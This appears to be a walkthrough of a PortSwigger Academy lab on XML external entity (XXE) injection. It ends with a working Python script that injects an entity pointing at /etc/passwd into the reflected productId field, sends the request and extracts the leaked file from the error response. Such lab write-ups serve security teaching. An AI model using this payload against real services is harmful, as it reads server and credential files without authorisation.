This lab has a “Check stock” feature that parses XML input and returns any unexpected values in the response.
To solve the lab, inject an XML external entity to retrieve the contents of the `/etc/passwd` file.
First, let’s collect some information on the web app by clicking around the store and watching the requests in Burp. Clicking the stock check option on a product page sends a POST request whose body is XML: the product and store IDs are sent as XML elements rather than form parameters. That XML body is what the server parses, so it is our injection point.
Let’s send it to Repeater and craft our payload. PortSwigger Academy gives the exact payload in its XXE vulnerability description: declare an external entity in a DOCTYPE that points at `file:///etc/passwd`, then reference that entity in place of the productId value. All we need to do is modify the request body accordingly and send it.
The server answers with a 400 Bad Request, because it tries to look up a product whose ID is now the expanded entity, but the error message echoes that value back, and with it the contents of `/etc/passwd`. The entity has to be referenced in a field the application reflects; a field it silently ignores would be parsed but leak nothing.
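The same steps as a script, added here as an example and not part of the original write-up or of PortSwigger's lab code. It builds the XXE body from the captured stock-check request, optionally sends it, and pulls the leaked file out of the error response. The `/product/stock` endpoint, the `Invalid product ID: ` error prefix and the sample response are assumptions made for this example; the `/etc/passwd` contents below are constructed, not a real capture.

```python
import re
import urllib.error
import urllib.request

# Stock-check body as captured in Burp (IDs are whatever product/store you clicked).
ORIGINAL_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    "<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
)

# Assumption: the lab echoes the bad value with this prefix in its 400 response.
ERROR_PREFIX = "Invalid product ID: "

# Constructed sample of what comes back; not a real capture.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
)
SAMPLE_RESPONSE = ERROR_PREFIX + SAMPLE_PASSWD


def build_xxe_body(body: str, path: str = "/etc/passwd", entity: str = "xxe") -> str:
    """Declare an external entity in a DOCTYPE and reference it in productId.

    productId is the field the server reflects in its error message, so that is
    where the entity reference must go; the DOCTYPE goes after the XML declaration
    and before the root element.
    """
    doctype = f'<!DOCTYPE stockCheck [ <!ENTITY {entity} SYSTEM "file://{path}"> ]>'
    decl_end = body.index("?>") + 2
    injected = body[:decl_end] + doctype + body[decl_end:]
    injected, n = re.subn(
        r"<productId>[^<]*</productId>",
        f"<productId>&{entity};</productId>",
        injected,
        count=1,
    )
    if n != 1:
        raise ValueError("productId element not found in request body")
    return injected


def extract_leaked_file(response_body: str, prefix: str = ERROR_PREFIX) -> str:
    """Strip the error-message prefix; what remains is the expanded entity."""
    if not response_body.startswith(prefix):
        raise ValueError("response does not look like the reflected error message")
    return response_body[len(prefix):]


def parse_passwd(contents: str) -> list[tuple[str, str, str]]:
    """Return (user, uid, shell) per line, as a sanity check that the leak is real."""
    rows = []
    for line in contents.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:  # passwd lines always have seven colon-separated fields
            continue
        rows.append((fields[0], fields[2], fields[6]))
    return rows


def send_stock_check(lab_host: str, body: str) -> tuple[int, str]:
    """POST the body to the (assumed) /product/stock endpoint; return (status, body).

    The XXE payload is expected to produce a 400 whose body carries the file.
    """
    req = urllib.request.Request(
        f"https://{lab_host}/product/stock",
        data=body.encode(),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode()


if __name__ == "__main__":
    print(build_xxe_body(ORIGINAL_BODY))
    # Offline demonstration on the constructed response; against the real lab,
    # pass send_stock_check(host, payload)[1] to extract_leaked_file instead.
    for user, uid, shell in parse_passwd(extract_leaked_file(SAMPLE_RESPONSE)):
        print(f"{user:10} uid={uid:<5} shell={shell}")
```

Why the entity goes into productId and not storeId: only the reflected field carries data out. If you change `path` to a file that does not exist or that the parser cannot read, the server still answers 400 but the prefix is followed by an empty or unrelated value, which is the first thing to check when the response looks wrong.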
The lab is solved.